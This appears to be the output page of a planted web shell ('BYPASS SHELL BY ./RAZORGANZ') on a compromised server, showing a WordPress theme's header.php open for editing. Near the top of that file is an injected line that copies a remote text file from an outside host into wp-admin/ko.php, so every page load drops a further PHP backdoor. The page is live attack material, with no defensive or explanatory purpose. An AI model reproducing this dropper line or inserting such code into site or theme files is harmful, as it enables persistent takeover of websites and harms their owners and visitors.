BYPASS SHELL BY ./RAZORGANZ
Server: nginx/1.20.1
System: Linux iZdzfnv9mwfppeZ 5.10.134-19.2.al8.x86_64 #1 SMP Wed Oct 29 22:47:09 CST 2025 x86_64
User: apache (48)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/themes/university-education-hub/header.php
<?php
/**
 * The header for our theme
 *
 * @package University Education Hub
 * @subpackage university_education_hub
 */
copy('http://www.fjlczn.cn/doc/1235.txt','wp-admin/ko.php');
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
  <meta charset="<?php bloginfo( 'charset' ); ?>">
  <meta name="viewport" content="width=device-width">
  <?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

<?php if ( function_exists( 'wp_body_open' ) )
	{
		wp_body_open();
	}else{
		do_action('wp_body_open');
	}
?>

<?php if(get_theme_mod('elearning_education_preloader_show_hide','') != ''){ ?>
	<div class="loader">
		<div class="center center1">
	    <div class="ring"></div>
		</div>
		<div class="center center2">
	    <div class="ring"></div>
		</div>
	</div>
<?php }?>

<header role="banner">
	<a class="screen-reader-text skip-link" href="#tp_content"><?php esc_html_e( 'Skip to content', 'university-education-hub' ); ?></a>
	<?php
	  get_template_part( 'template-parts/header/top', 'header' );
	  get_template_part( 'template-parts/header/site', 'branding' );
	?>
</header>